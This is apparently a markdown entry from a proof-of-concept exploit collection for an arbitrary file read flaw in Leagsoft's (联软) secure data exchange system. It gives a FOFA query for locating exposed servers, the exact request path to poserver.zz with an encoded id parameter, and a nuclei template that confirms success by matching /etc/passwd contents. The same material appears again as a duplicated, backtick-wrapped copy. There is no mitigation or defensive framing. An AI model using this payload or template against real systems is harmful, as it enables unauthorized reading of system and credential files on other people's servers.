POC/wpoc/联软/联软安全数据交换系统任意文件读取.md

## 联软安全数据交换系统任意文件读取

## fofa
```
body="UniExServices"
```

## poc
```
/UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI=
```

## nuclei
```
id: leagsoft-safedata-exchange-file-fileread

info:
  name: 联软安全数据交换系统任意文件读取
  author: mmy
  severity: high
  tags: leagsoft,fileread
  description: 联软安全数据交换系统任意文件读取
  reference:
    - 
  metadata: 
    fofa-query: 'body="UniExServices"'
    verified: true
    max-request: 1

http:
  - method: GET
    path:
      - "{{RootURL}}/UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI="

    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0:"

```
first commit 2025-03-04 23:12:57 +08:00			`## 联软安全数据交换系统任意文件读取`

			`## fofa`
			```
			`body="UniExServices"`
			```

			`## poc`
			```
			`/UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI=`
			```

			`## nuclei`
			```
			`id: leagsoft-safedata-exchange-file-fileread`

			`info:`
			`name: 联软安全数据交换系统任意文件读取`
			`author: mmy`
			`severity: high`
			`tags: leagsoft,fileread`
			`description: 联软安全数据交换系统任意文件读取`
			`reference:`
			`-`
			`metadata:`
			`fofa-query: 'body="UniExServices"'`
			`verified: true`
			`max-request: 1`

			`http:`
			`- method: GET`
			`path:`
			`- "{{RootURL}}/UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI="`

			`matchers:`
			`- type: regex`
			`part: body`
			`regex:`
			`- "root:[x*]:0:0:"`

			```